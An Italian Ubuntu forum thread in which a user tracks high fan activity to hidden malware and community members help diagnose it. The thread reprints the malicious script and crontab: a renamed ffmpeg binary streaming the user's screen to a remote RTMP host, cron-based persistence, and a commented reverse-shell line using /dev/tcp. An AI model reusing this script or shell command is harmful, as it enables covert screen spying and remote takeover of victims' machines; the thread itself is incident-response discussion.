Pc compromesso, consigli.

Sicurezza del sistema: firewall, antispam, antivirus, ssh, patch, bug, eccetera.
kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Pc compromesso, consigli.

Messaggio da kjmario78 » mercoledì 30 ottobre 2019, 22:46

Ciao a tutti,
nonostante utilizzi il portatile solo per navigare su internet ho quasi sempre le ventole accese.. è possibile capire quale sia la causa?
Ultima modifica di kjmario78 il venerdì 1 novembre 2019, 22:25, modificato 1 volta in totale.
Ubuntu 19.04 64bit
Gnome 3.32.1

Nexol
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1069
Iscrizione: venerdì 13 novembre 2009, 10:15

Re: Ventole quasi sempre accese.

Messaggio da Nexol » mercoledì 30 ottobre 2019, 23:33

Installa

Codice: Seleziona tutto

sudo apt install htop
avvialo e verifica qual'è il processo che sta divorando tempo della CPU.
Ubuntu 18.04.3 --> Notebook Dell 1747 - Intel Core i7-720QM - 8GB Ram - Scheda grafica AMD Mobility Radeon HD 4650 1GB Ram con driver radeon

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 9:05

Nexol [url=https://forum.ubuntu-it.org/viewtopic.php?p=5159884#p5159884][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:Installa

Codice: Seleziona tutto

sudo apt install htop
avvialo e verifica qual'è il processo che sta divorando tempo della CPU.
Grazie, verificando con il comando top ho questi risultati:

Codice: Seleziona tutto

top - 08:53:52 up 5 min,  1 user,  load average: 2,87, 2,34, 1,08
Tasks: 269 total,   3 running, 266 sleeping,   0 stopped,   0 zombie
%Cpu(s): 16,9 us,  2,1 sy, 18,8 ni, 59,1 id,  0,0 wa,  0,0 hi,  3,1 si,  0,0 st
MiB Mem :   7821,1 total,   3116,0 free,   2951,3 used,   1753,8 buff/cache
MiB Swap:      0,0 total,      0,0 free,      0,0 used.   4315,9 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                                                                               
 2780 mario     20   0 1335844 906356  41624 S 127,9  11,3   5:49.74 systemdi                                                                                              
 2542 mario     20   0  362300 112932  94232 R   7,7   1,4   0:14.77 Xorg                                                                                                  
 2754 mario     20   0 2981304 505676  88076 R   5,4   6,3   0:15.20 gnome-shell                                                                                           
 3377 mario     20   0 2576432 208464 146340 S   5,4   2,6   0:14.12 Web Content                                                                                           
 3249 mario     20   0 3595500 343860 166884 S   2,3   4,3   0:26.30 firefox                                                                                               
 5580 mario     20   0  885240  48328  35720 S   2,3   0,6   0:00.47 gnome-terminal-                                                                                       
   11 root      20   0       0      0      0 I   0,3   0,0   0:00.42 rcu_sched                                                                                             
   44 root      20   0       0      0      0 D   0,3   0,0   0:00.32 kworker/u8:1+events_unbound                                                                           
  254 root     -51   0       0      0      0 S   0,3   0,0   0:00.61 irq/51-DELL073B                                                                                       
  521 root     -51   0       0      0      0 S   0,3   0,0   0:00.84 irq/150-iwlwifi                                                                                       
 1200 redis     20   0   52700   4480   3188 S   0,3   0,1   0:00.35 redis-server                                                                                          
    1 root      20   0  168972  12624   7820 S   0,0   0,2   0:01.51 systemd                                                                                               
    2 root      20   0       0      0      0 S   0,0   0,0   0:00.00 kthreadd                                                                                              
    3 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 rcu_gp                                                                                                
    4 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 rcu_par_gp                                                                                            
    5 root      20   0       0      0      0 I   0,0   0,0   0:00.24 kworker/0:0-cgroup_destroy                                                                            
    6 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 kworker/0:0H                                                                                          
    7 root      20   0       0      0      0 I   0,0   0,0   0:00.22 kworker/0:1-events                                                                                top - 08:54:16 up 5 min,  1 user,  load average: 2,67, 2,34, 1,11
top - 08:54:51 up 6 min,  1 user,  load average: 2,17, 2,26, 1,13
Tasks: 257 total,   1 running, 256 sleeping,   0 stopped,   0 zombie
%Cpu(s): 14,8 us,  0,6 sy, 18,1 ni, 63,4 id,  0,1 wa,  0,0 hi,  3,1 si,  0,0 st
MiB Mem :   7821,1 total,   3108,3 free,   2946,2 used,   1766,6 buff/cache
MiB Swap:      0,0 total,      0,0 free,      0,0 used.   4324,2 avail Mem 

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                                                                           
 2780 mario     20   0 1335844 906620  41624 S 123,6  11,3   7:08.68 systemdi                                                                                          
 3377 mario     20   0 2576432 208464 146340 S   4,7   2,6   0:16.96 Web Content                                                                                       
 2542 mario     20   0  362428 112956  94256 S   4,0   1,4   0:18.17 Xorg                                                                                              
 3249 mario     20   0 3668696 344360 171212 S   2,3   4,3   0:27.50 firefox                                                                                           
 3438 mario     20   0 2661036 199028 100792 S   1,3   2,5   0:14.36 WebExtensions                                                                                     
  521 root     -51   0       0      0      0 S   0,3   0,0   0:00.99 irq/150-iwlwifi                                                                                   
 1052 message+  20   0   17000  14048   4000 S   0,3   0,2   0:02.09 dbus-daemon                                                                                       
 1066 root      20   0  338976  20196  16632 S   0,3   0,3   0:00.59 NetworkManager                                                                                    
 1085 root      20   0  124776   9848   9028 S   0,3   0,1   0:00.72 thermald                                                                                          
 5602 mario     20   0   12068   3868   3060 R   0,3   0,0   0:00.15 top                                                                                               
    1 root      20   0  168972  12624   7820 S   0,0   0,2   0:01.54 systemd                                                                                           
    2 root      20   0       0      0      0 S   0,0   0,0   0:00.00 kthreadd                                                                                          
    3 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 rcu_gp                                                                                            
    4 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 rcu_par_gp                                                                                        
    5 root      20   0       0      0      0 I   0,0   0,0   0:00.24 kworker/0:0-events                                                                                
    6 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 kworker/0:0H                                                                                      
    7 root      20   0       0      0      0 I   0,0   0,0   0:00.22 kworker/0:1-events                                                                                
    9 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 mm_percpu_wq                                                                                      
   10 root      20   0       0      0      0 S   0,0   0,0   0:00.04 ksoftirqd/0                                                                                       
   11 root      20   0       0      0      0 I   0,0   0,0   0:00.46 rcu_sched                                                                                         
   12 root      rt   0       0      0      0 S   0,0   0,0   0:00.00 migration/0                                                                                       
   13 root     -51   0       0      0      0 S   0,0   0,0   0:00.00 idle_inject/0                                                                                     
   14 root      20   0       0      0      0 S   0,0   0,0   0:00.00 cpuhp/0                                                                                           
   15 root      20   0       0      0      0 S   0,0   0,0   0:00.00 cpuhp/1                                                                                           
   16 root     -51   0       0      0      0 S   0,0   0,0   0:00.00 idle_inject/1                                                                                     
   17 root      rt   0       0      0      0 S   0,0   0,0   0:00.00 migration/1                                                                                       
   18 root      20   0       0      0      0 S   0,0   0,0   0:00.04 ksoftirqd/1                                                                                       
   19 root      20   0       0      0      0 I   0,0   0,0   0:00.09 kworker/1:0-events                                                                                
   20 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 kworker/1:0H-kblockd                                                                              
   21 root      20   0       0      0      0 S   0,0   0,0   0:00.00 cpuhp/2                                                                                           
   22 root     -51   0       0      0      0 S   0,0   0,0   0:00.00 idle_inject/2                                                                                     
   23 root      rt   0       0      0      0 S   0,0   0,0   0:00.00 migration/2                                                                                       
   24 root      20   0       0      0      0 S   0,0   0,0   0:00.06 ksoftirqd/2                                                                                       
   26 root       0 -20       0      0      0 I   0,0   0,0   0:00.00 kworker/2:0H-kblockd                                                                              
   27 root      20   0       0      0      0 S   0,0   0,0   0:00.00 cpuhp/3                                                                                           
   28 root     -51   0       0      0      0 S   0,0   0,0   0:00.00 idle_inject/3                                                                                     
   29 root      rt   0       0      0      0 S   0,0   0,0   0:00.00 migration/3                                                                                       

Con htop

Codice: Seleziona tutto

  1  [|||||||||||||||||||||||||||||||||||                                 44.8%]   Tasks: 147, 425 thr; 2 running
  2  [||||||||||||||||||||||||||||||||                                    42.1%]   Load average: 1.10 1.94 1.40 
  3  [|||||||||||||||||||||||||||||||                                     41.6%]   Uptime: 00:12:28
  4  [||||||||||||||||||||||||||||||||||||||||                            53.0%]
  Mem[||||||||||||||||||||||||||||||||||||||||||||||||              3.15G/7.64G]
  Swp[                                                                    0K/0K]

  PID USER      PRI  NI  VIRT   RES   SHR S CPU% MEM%   TIME+  Command
 8243 mario      20   0 1303M  879M 41716 S 142. 11.2  0:18.92 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
 8254 mario      30  10 1303M  879M 41716 S 32.2 11.2  0:02.34 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
 8250 mario      30  10 1303M  879M 41716 S 27.5 11.2  0:02.26 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
 8252 mario      30  10 1303M  879M 41716 S 14.8 11.2  0:02.06 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
 3377 mario      20   0 2538M  216M  154M S 14.1  2.8  1:01.91 /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 1 -prefMapSize 206960 -parentBu
 8251 mario      30  10 1303M  879M 41716 S 13.4 11.2  0:02.14 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
 8253 mario      30  10 1303M  879M 41716 S 12.1 11.2  0:02.03 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
 8256 mario      20   0 1303M  879M 41716 S 11.4 11.2  0:02.04 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
 8255 mario      30  10 1303M  879M 41716 S 11.4 11.2  0:02.07 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
 2542 mario      20   0  356M  111M 95136 S  7.4  1.4  0:43.24 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keept
 2754 mario      20   0 3164M  495M 86356 S  4.7  6.3  0:28.94 /usr/bin/gnome-shell
 5580 mario      20   0  865M 49984 35988 S  3.4  0.6  0:06.09 /usr/libexec/gnome-terminal-server
 3249 mario      20   0 3604M  380M  179M S  2.7  4.9  0:49.13 /usr/lib/firefox/firefox -new-window
 8216 mario      20   0 11380  4572  3244 R  2.7  0.1  0:00.53 htop
 3350 mario      20   0 3604M  380M  179M S  2.0  4.9  0:13.16 /usr/lib/firefox/firefox -new-window
 3380 mario      20   0 2538M  216M  154M S  1.3  2.8  0:04.35 /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 1 -prefMapSize 206960 -parentBu
 3398 mario      20   0 2538M  216M  154M R  0.7  2.8  0:05.59 /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 1 -prefMapSize 206960 -parentBu
 3330 mario      20   0 3604M  380M  179M S  0.7  4.9  0:03.89 /usr/lib/firefox/firefox -new-window
 3349 mario      20   0 3604M  380M  179M S  0.7  4.9  0:02.64 /usr/lib/firefox/firefox -new-window
 1743 root       20   0 1105M 10096  8800 S  0.7  0.1  0:00.72 /opt/teamviewer/tv_bin/teamviewerd -d
 2555 mario      20   0  356M  111M 95136 S  0.7  1.4  0:02.61 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keept
 3359 mario      20   0 3604M  380M  179M S  0.7  4.9  0:01.94 /usr/lib/firefox/firefox -new-window
 1200 redis      20   0 52700  4480  3188 S  0.7  0.1  0:00.93 /usr/bin/redis-server 127.0.0.1:6379
 1754 root       20   0 1105M 10096  8800 S  0.7  0.1  0:00.04 /opt/teamviewer/tv_bin/teamviewerd -d
 2956 mario      20   0  421M 30048 20708 S  0.7  0.4  0:00.34 /usr/lib/gnome-settings-daemon/gsd-color
 3456 mario      20   0 2595M  186M   98M S  0.7  2.4  0:00.05 /usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 6282 -prefMapSize 206960 -paren
 3393 mario      20   0 2538M  216M  154M S  0.0  2.8  0:00.35 /usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 1 -prefMapSize 206960 -parentBu
 1028 root       20   0  2528   772   704 S  0.0  0.0  0:00.04 /usr/sbin/acpid
 2873 mario      20   0  376M  8812  7128 S  0.0  0.1  0:00.57 ibus-daemon --panel disable -r --xim
 3098 mario      20   0  159M  7088  6472 S  0.0  0.1  0:00.21 /usr/lib/ibus/ibus-engine-simple
 4664 mario      20   0 2321M 86952 66160 S  0.0  1.1  0:00.44 /usr/lib/firefox/firefox -contentproc -childID 5 -isForBrowser -prefsLen 8433 -prefMapSize 206960 -paren
 1148 root       20   0  121M  9848  9028 S  0.0  0.1  0:01.22 /usr/sbin/thermald --no-daemon --dbus-enable
 1085 root       20   0  121M  9848  9028 S  0.0  0.1  0:01.30 /usr/sbin/thermald --no-daemon --dbus-enable
 1022 root       20   0  226M  6520  5544 S  0.0  0.1  0:00.20 /usr/sbin/iio-sensor-proxy
F1Help  F2Setup F3SearchF4FilterF5Tree  F6SortByF7Nice -F8Nice +F9Kill  F10Quit

cosa sarebbe e a cosa serve questo :

Codice: Seleziona tutto

 8255 mario      30  10 1303M  879M 41716 S 11.4 11.2  0:02.07 /usr/bin/systemdi -f x11grab -s 1920x1080 -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575
Ubuntu 19.04 64bit
Gnome 3.32.1

andrea111
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1603
Iscrizione: mercoledì 7 novembre 2007, 4:18

Re: Ventole quasi sempre accese.

Messaggio da andrea111 » giovedì 31 ottobre 2019, 16:19

Mi pare che sia impegnati in attività parecchio pesanti.
x11grab -s 1920x1080
significa che sta catturando (registrando) l'intero schermo (a risoluzione 1920x1080)
-vcodec libx264
significa che sta utilizzando i codec (codifica/decodifica) secondo lo standard h264 (H.264), uno standard pretenzioso.
rtmp://2.114.244.114:7575
rtpm è relativo a server per lo streaming video (hai installato un server per video live?)
l'indirizzo IP 2.114.244.128 parrebbe relativo al dominio telecom italia.

Ti risulta?

Questo ti succede solo dopo che hai avviato firefox e stai facendo straming di video o sempre (quando hai la rete attiva), fai video chat?.
Sei preoccupato?

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 17:34

Ciao Andrea grazie per la risposta.. nulla di tutto questo, non faccio streaming, non faccio videochat.
Significa che ho il pc compromesso ? Come posso interrompere e verificare da dove è partito tutto?
rtmp://2.114.244.114:7575
non è il mio ip.

andrea111 ha scritto:Mi pare che sia impegnati in attività parecchio pesanti.
x11grab -s 1920x1080
significa che sta catturando (registrando) l'intero schermo (a risoluzione 1920x1080)
-vcodec libx264
significa che sta utilizzando i codec (codifica/decodifica) secondo lo standard h264 (H.264), uno standard pretenzioso.
rtmp://2.114.244.114:7575
rtpm è relativo a server per lo streaming video (hai installato un server per video live?)
l'indirizzo IP 2.114.244.128 parrebbe relativo al dominio telecom italia.

Ti risulta?

Questo ti succede solo dopo che hai avviato firefox e stai facendo straming di video o sempre (quando hai la rete attiva), fai video chat?.
Sei preoccupato?
Ubuntu 19.04 64bit
Gnome 3.32.1

andrea111
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1603
Iscrizione: mercoledì 7 novembre 2007, 4:18

Re: Ventole quasi sempre accese.

Messaggio da andrea111 » giovedì 31 ottobre 2019, 19:49

Quindi sospetti un hackeraggio del PC.
Intanto escludiamo altre ipotesi: sei l'unico ad avere accesso al PC? (familiari, conoscenti, parenti)

Telecom è il tuo provider di internet? l'IP 2.114.244.128 è relativo al dominio telecom.

Insomma sei sicuro di non avere attivato qualche servizio di streaming video? (magari inavvertitamente) tu o qualcuno che ha accesso al PC.

Intanto vai a vedere questo file /usr/bin/systemdi (io non ce l'ho) e come nome mi suona nuovo.
Clic destro sul file e Proprietà e vedi:
dimensione
data ultimo accesso
data ultima modifica (che di solito è la data di installazione)
Dovresti anche poter distinguere se è un file binario o di shell (leggibile direttamente con gedit).

Avatar utente
frapox
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1054
Iscrizione: sabato 31 dicembre 2005, 19:22
Desktop: Gnome 3
Distribuzione: Arch, Debian Sid
Località: Lombardia

Re: Ventole quasi sempre accese.

Messaggio da frapox » giovedì 31 ottobre 2019, 20:01

Quoto le domande di andrea111.

Il file /usr/bin/systemdi non appartiene a nessun pacchetto nei repo di Ubuntu, né mi salta fuori qualcosa di utile nelle ricerche con google.

Io come prima cosa spegnerei quel computer, e poi continuerei (magari da live) a fare accertamenti.

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 20:07

andrea111 ha scritto: Quindi sospetti un hackeraggio del PC
eh boh, sinceramente non saprei cosa pensare.. Il portatile è mio personale non lo usa nessun altro. Il mio provider non è telecom ma tiscali.
andrea111 ha scritto: Insomma sei sicuro di non avere attivato qualche servizio di streaming video? (magari inavvertitamente)
inavvertitamente potrebbe essere volontariamente no sicuro.
andrea111 ha scritto:
Intanto vai a vedere questo file /usr/bin/systemdi (io non ce l'ho) e come nome mi suona nuovo.
Clic destro sul file e Proprietà e vedi:
dimensione
.......
Porca miseria l'ho rimosso dopo il tuo precedente messaggio :|
Però avevo dato un /usr/bin/systemdi -h e il terminale stampava le info di ffmpeg

Non c'è un log dove poter guardare?
Ubuntu 19.04 64bit
Gnome 3.32.1

andrea111
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1603
Iscrizione: mercoledì 7 novembre 2007, 4:18

Re: Ventole quasi sempre accese.

Messaggio da andrea111 » giovedì 31 ottobre 2019, 20:15

Eliminato proprio o spostato nel cestino? controlla.
Sarebbe interessante darci un'occhiata e sapere quando è stato installato, quanto è grosso e, se è leggibile, cosa fa.

Si può accertare se è un servizio richiesto (magari involontariamente).

Una volta tolto di mezzo il file, il problema si ripresenta? Non dovrebbe, oppure il file si "rigenera"?

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 20:20

Mannaggia purtroppo si, eliminato da riga da comando.

Guardando su crontab però ho trovato questo

Codice: Seleziona tutto

# m h  dom mon dow   command
* * * * * pgrep debconfi > /dev/null || /etc/debconfi
*/30 * * * * pkill debconfi
*/30 * * * * pkill systemdi
e questo è il contenuto dello script /etc/debconfi dove è presente quel comando...

Codice: Seleziona tutto

#!/bin/bash
export DISPLAY=:0

while true; do

        sleep 1

        if pgrep systemdi >/dev/null 2>&1
                then
                        echo Processo in Esecuzione
                else
                        /usr/bin/systemdi -f x11grab -s $(xdpyinfo | grep dimensions | sed -r 's/^[^0-9]*([0-9]+x[0-9]+).*$/\1/') -i :0 -r 60 -vcodec libx264 -f flv rtmp://2.114.244.114:7575

        fi
	#sudo su test -c /bin/bash >& /dev/tcp/188.217.151.81/7576 0>&1
done

Ubuntu 19.04 64bit
Gnome 3.32.1

andrea111
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1603
Iscrizione: mercoledì 7 novembre 2007, 4:18

Re: Ventole quasi sempre accese.

Messaggio da andrea111 » giovedì 31 ottobre 2019, 20:49

Elementare come file.

Ma il problema si presenta ancora? (fai un riavvio).

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 20:55

No a quanto pare nei processi non è più presente e nemmeno le ventole si sono accese.

Riavviato diverse volte
Ubuntu 19.04 64bit
Gnome 3.32.1

Avatar utente
frapox
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1054
Iscrizione: sabato 31 dicembre 2005, 19:22
Desktop: Gnome 3
Distribuzione: Arch, Debian Sid
Località: Lombardia

Re: Ventole quasi sempre accese.

Messaggio da frapox » giovedì 31 ottobre 2019, 21:09

kjmario78 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160042#p5160042][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
No a quanto pare nei processi non è più presente e nemmeno le ventole si sono accese.

Riavviato diverse volte
/etc/debconfi e /usr/bin/systemdi non sono presenti nei repo, in nessun pacchetto.

Mi pare strano anche che facciano parte di qualche gioco (fai gaming?) o di qualche altro pacchetto esterno, visto che hanno un nome terribilmente simile a debconf e systemd (che invece sono tool di sistema noti e legittiimi) il che mi rende piuttosto sospettoso.

I comandi

Codice: Seleziona tutto

dpkg -S /etc/debconfi
dpkg -S /usr/bin/systemdi
Ti restituiscono qualche output?

PS. non si rimuovono MAI file di sistema a mano con rm, ma si ricorre sempre al package manager (apt).

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 21:15

Codice: Seleziona tutto

mario@Inspiron:~$ dpkg -S /etc/debconfi
dpkg-query: nessun percorso corrispondente a /etc/debconfi
mario@Inspiron:~$ dpkg -S /usr/bin/systemdi
dpkg-query: nessun percorso corrispondente a /usr/bin/systemdi
No zero. Per la rimozione dei pacchetti uso sempre apt, stavolta purtroppo è andata cosi.
Ubuntu 19.04 64bit
Gnome 3.32.1

Avatar utente
frapox
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1054
Iscrizione: sabato 31 dicembre 2005, 19:22
Desktop: Gnome 3
Distribuzione: Arch, Debian Sid
Località: Lombardia

Re: Ventole quasi sempre accese.

Messaggio da frapox » giovedì 31 ottobre 2019, 21:24

kjmario78 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160049#p5160049][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:

Codice: Seleziona tutto

mario@Inspiron:~$ dpkg -S /etc/debconfi
dpkg-query: nessun percorso corrispondente a /etc/debconfi
mario@Inspiron:~$ dpkg -S /usr/bin/systemdi
dpkg-query: nessun percorso corrispondente a /usr/bin/systemdi
No zero. Per la rimozione dei pacchetti uso sempre apt, stavolta purtroppo è andata cosi.
Ok, allora quei file non appartengono a nessun pacchetto che hai legittimamente installato tramite il package manager. Vuol dire quindi che qualcuno o qualcos'altro li ha installati per te, tanto più se non sapevi neanche che alcune istanze di "systemdi" fossero in esecuzione. Inoltre il nome di questi eseguibili è terribilmente sospetto, come dicevo.

Sono andato a controllare e x11grab è un modulo di ffmpeg che cattura la schermata di x11 e la spedisce in streaming a un host remoto.
https://www.ffmpeg.org/ffmpeg-devices.html#x11grab

Non posso dirlo con certezza ma è ritengo possibile che "systemdi" fosse uno script minimale che mascherasse ffmpeg.

Se tutto questo è vero, capisci cosa vuol dire?

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 21:30

Sto riflettendo.. infatti prima di rimuovere quel file dando come comando /usr/bin/systemdi -h mi stampava ffmpeg . Ma adesso che ho eliminato quel file cosa dovrei fare?


frapox [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160052#p5160052][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
kjmario78 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160049#p5160049][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:

Codice: Seleziona tutto

mario@Inspiron:~$ dpkg -S /etc/debconfi
dpkg-query: nessun percorso corrispondente a /etc/debconfi
mario@Inspiron:~$ dpkg -S /usr/bin/systemdi
dpkg-query: nessun percorso corrispondente a /usr/bin/systemdi
No zero. Per la rimozione dei pacchetti uso sempre apt, stavolta purtroppo è andata cosi.
Ok, allora quei file non appartengono a nessun pacchetto che hai legittimamente installato tramite il package manager. Vuol dire quindi che qualcuno o qualcos'altro li ha installati per te, tanto più se non sapevi neanche che alcune istanze di "systemdi" fossero in esecuzione. Inoltre il nome di questi eseguibili è terribilmente sospetto, come dicevo.

Sono andato a controllare e x11grab è un modulo di ffmpeg che cattura la schermata di x11 e la spedisce in streaming a un host remoto.
https://www.ffmpeg.org/ffmpeg-devices.html#x11grab

Non posso dirlo con certezza ma è ritengo possibile che "systemdi" fosse uno script minimale che mascherasse ffmpeg.

Se tutto questo è vero, capisci cosa vuol dire?
Ubuntu 19.04 64bit
Gnome 3.32.1

Avatar utente
frapox
Entusiasta Emergente
Entusiasta Emergente
Messaggi: 1054
Iscrizione: sabato 31 dicembre 2005, 19:22
Desktop: Gnome 3
Distribuzione: Arch, Debian Sid
Località: Lombardia

Re: Ventole quasi sempre accese.

Messaggio da frapox » giovedì 31 ottobre 2019, 21:33

kjmario78 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160054#p5160054][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:Sto riflettendo.. infatti prima di rimuovere quel file dando come comando /usr/bin/systemdi -h mi stampava ffmpeg . Ma adesso che ho eliminato quel file cosa dovrei fare?
Beh, considerando che a tua insaputa avevi uno script che faceva streaming del tuo schermo e lo inviava in remoto a qualcuno... direi che l'unica cosa da fare è: salvare i tuoi dati, e reinstallare ubuntu pulito.

Inoltre direi che devi cambiare tutte le password di accesso ai siti che hai digitato (in chiaro).

E d'ora in avanti installare solo roba proveniente dai repo o da fonti terze ma ultra-fidate.

Avatar utente
Stealth
Tenace Tecnocrate
Tenace Tecnocrate
Messaggi: 16448
Iscrizione: martedì 31 gennaio 2006, 22:55
Desktop: Gnome
Distribuzione: Ubuntu 18.04 LTS

Re: Ventole quasi sempre accese.

Messaggio da Stealth » giovedì 31 ottobre 2019, 21:36

È come penso (dal nome) la tua domanda o un caso analogo?
https://unix.stackexchange.com/question ... nux-ubuntu

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 23:43

Si la mia domanda. L'ansia di sapere cosa fosse e ho postato anche li.
Ubuntu 19.04 64bit
Gnome 3.32.1

kjmario78
Prode Principiante
Messaggi: 22
Iscrizione: giovedì 10 marzo 2011, 14:33

Re: Ventole quasi sempre accese.

Messaggio da kjmario78 » giovedì 31 ottobre 2019, 23:47

frapox [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160057#p5160057][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
kjmario78 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160054#p5160054][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:Sto riflettendo.. infatti prima di rimuovere quel file dando come comando /usr/bin/systemdi -h mi stampava ffmpeg . Ma adesso che ho eliminato quel file cosa dovrei fare?
Beh, considerando che a tua insaputa avevi uno script che faceva streaming del tuo schermo e lo inviava in remoto a qualcuno... direi che l'unica cosa da fare è: salvare i tuoi dati, e reinstallare ubuntu pulito.

Inoltre direi che devi cambiare tutte le password di accesso ai siti che hai digitato (in chiaro).

E d'ora in avanti installare solo roba proveniente dai repo o da fonti terze ma ultra-fidate.
Grazie per i preziosi consigli. . ma non c'è modo di approfondire attraverso i log? vorrei capire da quanto tempo, come si sia installato..
Ubuntu 19.04 64bit
Gnome 3.32.1

Scrivi risposta

Torna a “Sicurezza”

Chi c’è in linea

Visualizzano questa sezione: 0 utenti iscritti e 3 ospiti